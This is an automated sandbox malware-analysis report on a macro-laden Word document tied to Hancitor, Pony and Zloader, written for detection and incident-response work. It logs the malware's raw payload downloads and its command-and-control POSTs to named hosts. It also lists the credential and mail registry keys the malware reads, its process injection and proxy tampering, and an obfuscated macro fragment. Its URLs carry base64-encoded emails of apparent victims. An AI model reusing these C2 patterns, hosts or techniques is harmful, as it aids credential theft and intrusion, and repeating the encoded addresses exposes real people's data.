bad.doc
This report is generated from a file or URL submitted to this webservice on August 8th 2017 17:07:25 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v6.90 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Tries to identify its external IP address
- Spyware
- POSTs files to a webserver
- Stealer/Phishing
-
Scans for artifacts that may help identify the target
Touched instant messenger related registry keys - Persistence
-
Spawns a lot of processes
Writes data to a remote process - Fingerprint
-
Reads the active computer name
Reads the cryptographic machine GUID
Scans for artifacts that may help identify the target
Tries to identify its external IP address - Evasive
- Detected document macro trying to fingerprint/evade the analysis environment
- Network Behavior
- Contacts 5 domains and 5 hosts. View all details
Additional Context
Related Sandbox Artifacts
- Associated URLs
-
hxxp://ELOQUENTMOBILE.COM/f.php?d=ZWFwYXB1bG92QHNiZXJiYW5rLnJ1
hxxp://eccheckin.com/f.php?d=d2lsbGlhbS5mZW5uZWxsQHNhbnRlZWNvb3Blci5jb20=
hxxp://survey.uno/f.php?d=am9obi52YXNrb3ZAcGFjb3VydHMudXM=
hxxp://tpgwva.com/f.php?d=aGVybXdvQHZzcC5jb20=
hxxp://convergedhealth.com/f.php?d=cmpvbmVzQHJpY29oZm9yZW5zaWNz LmNvbQ==
hxxp://earn.uno/f.php?d=cmpvbmVzQHJpY29oZm9yZW5zaWNzLmNvbQ==
hxxp://tpgwva.com/f.php?d=cmpvbmVzQHJpY29oZm9yZW5zaWNzLmNvbQ==
hxxp://cart.uno/f.php?d=ZGF2ZWVrQGF0dC5uZXQ=
hxxp://CART.UNO/f.php?d=YXAuaW52b2ljZXNAaW50ZXJkaWdpdGFsLmNvbQ
hxxp://businesstechnologysupport.com/f.php?d=ZGFtaWFuLnNpbXNAc3BhcmsuY28ubno=
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 18
-
Environment Awareness
-
Detected document macro trying to fingerprint/evade the analysis environment
- details
- Document contains auto-execute macro and tries to obtain external IP/ISP/host information
- source
- Indicator Combinations
- relevance
- 10/10
-
Detected document macro trying to fingerprint/evade the analysis environment
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET TROJAN Fareit/Pony Downloader Checkin 2" (SID: 2014411, Rev: 10, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY External IP Lookup api.ipify.org" (SID: 2021997, Rev: 2, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET TROJAN Trojan Generic - POST To gate.php with no referer" (SID: 2017930, Rev: 9, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Win32/Terdot.A / Zloader Checkin" (SID: 2809511, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Tordal/Hancitor/Chanitor" (SID: 2819978, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET TROJAN Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)" (SID: 2016858, Rev: 9, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.) - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 3/58 Antivirus vendors marked sample as malicious (5% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache"
"GET /wp-content/plugins/easyrotator-for-wordpress/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ariegenet.fr
Cache-Control: no-cache"
"GET /wp-content/plugins/easyrotator-for-wordpress/2 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ariegenet.fr
Cache-Control: no-cache"
"GET /wp-content/plugins/easyrotator-for-wordpress/3 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ariegenet.fr
Cache-Control: no-cache" - source
- Network Traffic
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"WINWORD.EXE" wrote 32 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 52 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 4 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 1024 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 7680 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 3072 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 8704 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"BNEBB1.tmp" wrote 32 bytes to a remote process "%WINDIR%\explorer.exe" (Handle: 100)
"BNEBB1.tmp" wrote 52 bytes to a remote process "%WINDIR%\explorer.exe" (Handle: 100)
"BNEBB1.tmp" wrote 4 bytes to a remote process "%WINDIR%\explorer.exe" (Handle: 100) - source
- API Call
- relevance
- 6/10
-
Writes data to a remote process
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "23.21.223.243" (ASN: , Owner: ): ...
URL: https://api.ipify.org/ (AV positives: 1/65 scanned on 08/08/2017 06:36:56)
URL: http://api.ipify.org/ (AV positives: 1/65 scanned on 08/07/2017 16:32:07)
File SHA256: 297db29a992ddfb67df72d29ef60c40f6a158e73ef19d9f5194dd253d04abbd6 (AV positives: 8/65 scanned on 08/08/2017 14:13:19)
File SHA256: 156ff6f23faf7b825f2038fb308047c83484b073ce6d3a12dbaf6ff70c536531 (AV positives: 8/62 scanned on 08/01/2017 00:53:51)
File SHA256: c9aff8bb86a77a7f45ee4368f5b7c260e5995b298e63b9c01862287fac5e5c31 (AV positives: 32/64 scanned on 07/31/2017 17:19:17)
File SHA256: a3ff7d4bd5e73ed0c45ce30be94f1d1c7f14c73f93574720a2fe679eee01fff2 (AV positives: 25/65 scanned on 07/31/2017 05:05:12)
File SHA256: fd47bad59f3713f999a612be55ef764f1cf1f0b93a6e640fbcb10b59e3efeb1f (AV positives: 23/64 scanned on 07/25/2017 08:58:39)
File SHA256: 5fa11e09415022ec591934a027b452c377da7c4100ab0f6fe879db0a300093a6 (Scanned on 07/09/2017 20:30:15)
Found malicious artifacts related to "213.186.33.19" (ASN: , Owner: ): ...
URL: http://www.masdepeyre.com/fr/ (AV positives: 2/65 scanned on 08/08/2017 14:55:21)
URL: https://www.barbararomagnan.eu/2012/11/ (AV positives: 1/65 scanned on 08/08/2017 14:37:20)
URL: http://soccam.fr/ (AV positives: 1/65 scanned on 08/08/2017 14:26:49)
URL: http://ondaitalia.net/blog/2015/11/17/rencontre-homme-femme-caddie/ (AV positives: 1/65 scanned on 08/08/2017 14:25:25)
URL: http://www.brulefert.fr/wp-admin/includes/w1reOffice365/w1reOffice365/m1cr0/index.php?userid=emily_e_mogen@keybank.com (AV positives: 3/65 scanned on 08/08/2017 14:19:01)
File SHA256: 1c01336d360fbd5c8f8c0eec7e6c5ff4f47df986831b8a9ce5850e39fda823ca (AV positives: 10/60 scanned on 08/08/2017 14:13:24)
File SHA256: 6fa8705ea65459de509c6e812a431abf6743b8860b729a5b107a039aee25899c (AV positives: 13/57 scanned on 08/08/2017 08:46:04)
File SHA256: b56ad0d8b823c049dc99ae0897a90ee0c1bfe6e2e8496026a1be1c075524c489 (AV positives: 50/64 scanned on 08/08/2017 05:46:54)
File SHA256: f38904e8444cea55342760c688a40f78478bfee89462a6a0675c01870388956b (AV positives: 49/64 scanned on 08/08/2017 05:45:41)
File SHA256: a354d8590006fd3465279392086e9f4f61c303c76eb13e438cbf6cf83a6a5fc4 (AV positives: 55/64 scanned on 08/08/2017 04:33:53)
File SHA256: d397a1812e0a3a755295f5c49574ca8820329a8ffc2d52a63670d2709a8b3db2 (Scanned on 07/20/2017 01:21:14)
File SHA256: 7c0b0ecbb9fb7e0cf14e91dea449206268bacdb855c1f263f34f85fc1017faab (Scanned on 06/22/2017 03:53:20)
File SHA256: 83f846847a21fb35da6338e1a80bf9e19e05c605a63e1ab63d44839e4536f264 (Scanned on 06/21/2017 19:15:46)
File SHA256: a76411acf347e0ba057c211e0375ca951ff619d4085d339249e06c075eaa9811 (Scanned on 06/13/2017 10:33:01)
File SHA256: 60f3fc78b63e3ca0303519e1dce049b9e4e128d6d4f83477d1cc209ebebf0745 (Scanned on 06/12/2017 20:03:26) - source
- Network Traffic
- relevance
- 10/10
-
Tries to identify its external IP address
- details
- "api.ipify.org"
- source
- Network Traffic
- relevance
- 6/10
-
Malicious artifacts seen in the context of a contacted host
-
Spyware/Information Retrieval
-
Scans for artifacts that may help identify the target
- details
-
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
"svchost.exe" (Path: "HKCU\IDENTITIES\{57AB3677-534E-4173-8F92-6566F6F82F10}\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\OUTLOOK\OMI ACCOUNT MANAGER\ACCOUNTS")
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\15.0\OUTLOOK\PROFILES\OUTLOOK")
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\16.0\OUTLOOK\PROFILES\OUTLOOK") - source
- Registry Access
- relevance
- 3/10
-
Touched instant messenger related registry keys
- details
- "svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
- source
- Registry Access
- relevance
- 5/10
-
Scans for artifacts that may help identify the target
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Contains native function calls
- details
- NtQueryInformationProcess@NTDLL.DLL from BNEBB1.tmp (PID: 1584) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Spawns a lot of processes
- details
- Spawned process "WINWORD.EXE" with commandline "/n "C:\7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.doc" (Show Process), Spawned process "svchost.exe" (Show Process), Spawned process "cmd.exe" with commandline "cmd /K" (Show Process), Spawned process "svchost.exe" (Show Process), Spawned process "BNEBB1.tmp" (Show Process), Spawned process "explorer.exe" (Show Process)
- source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 4 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 18
-
Anti-Detection/Stealthyness
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
-
"svchost.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
"explorer.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000") - source
- Registry Access
- relevance
- 3/10
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
-
Environment Awareness
-
Reads the active computer name
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"svchost.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"explorer.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME") - source
- Registry Access
- relevance
- 5/10
-
Reads the cryptographic machine GUID
- details
-
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"svchost.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"explorer.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
-
Reads the active computer name
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET TROJAN Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)" (SID: 2016173, Rev: 8, Severity: 2) categorized as "Potentially Bad Traffic" (Backdoor, ransomware, trojans, etc.)
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Emerging Threats Alert
-
General
-
Opened the service control manager
- details
-
"svchost.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"explorer.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1) - source
- API Call
- relevance
- 10/10
-
POSTs files to a webserver
- details
-
"POST /ls5/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: cethenjustte.com
Content-Length: 111
Cache-Control: no-cache" with no payload
"POST /mlu/forum.php HTTP/1.0
Host: cethenjustte.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 205
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" with no payload
"POST /d2/about.php HTTP/1.0
Host: cethenjustte.com
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 233
Content-Type: application/octet-stream
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Encoding: binary" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 261
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 1034
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 1107
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 561
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 780
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 577
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 799
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 929
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 686
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 643
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 432
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 582
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 1041
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 256
Connection: Close" with no payload - source
- Network Traffic
- relevance
- 5/10
-
Requested access to a system service
- details
-
"svchost.exe" called "OpenService" to access the "rasman" service
"svchost.exe" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"svchost.exe" called "OpenService" to access the "RASMAN" service
"svchost.exe" called "OpenService" to access the "ProtectedStorage" service
"svchost.exe" called "OpenService" to access the "ProtectedStorage" service requesting "SERVICE_START" (0X10) access rights
"svchost.exe" called "OpenService" to access the "VaultSvc" service
"explorer.exe" called "OpenService" to access the "rasman" service
"explorer.exe" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"explorer.exe" called "OpenService" to access the "RASMAN" service - source
- API Call
- relevance
- 10/10
-
Sent a control code to a service
- details
- "svchost.exe" called "ControlService" and sent control code "0X400" to the service "ProtectedStorage"
- source
- API Call
- relevance
- 10/10
-
Opened the service control manager
-
Installation/Persistance
-
Drops executable files
- details
- "BNEBB1.tmp" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Drops executable files
-
Network Related
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- source
- Network Traffic
- relevance
- 10/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
-
System Security
-
Modifies proxy settings
- details
-
"svchost.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"svchost.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"svchost.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"explorer.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
"explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK") - source
- Registry Access
- relevance
- 8/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
- source
- Static Parser
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
"WINWORD.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "NUMSHAPE")
"svchost.exe" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "LOCALENAME")
"cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 4 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 16
-
Environment Awareness
-
Reads the registry for installed applications
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER NPAPI")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA0")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA1")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA10")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA100")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA101")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA102")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA103") - source
- Registry Access
- relevance
- 10/10
-
Reads the registry for installed applications
-
General
-
Contacts domains
- details
-
"api.ipify.org"
"cethenjustte.com"
"ariegenet.fr"
"tingotosling.com"
"keportsitno.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"23.21.223.243:80"
"86.110.117.167:80"
"213.186.33.19:80"
"185.42.14.83:80"
"185.133.42.219:80" - source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub avifauna()
Dim acrogen As Long
Dim deterrent As Long
affectingly.tuille.Value = Day(#12/5/2013#)
varday = moles = "scindapsus"
hedged = "brilliant"
doxy = "gabon"
melilotus = "dendranthema"
timetable = "acridotheres"
necrosis = "insinuate"
glyphography = "dryopteridaceae"
Set aquaplane = affectingly.tuille.SelectedItem
tranquil = 80 + 4
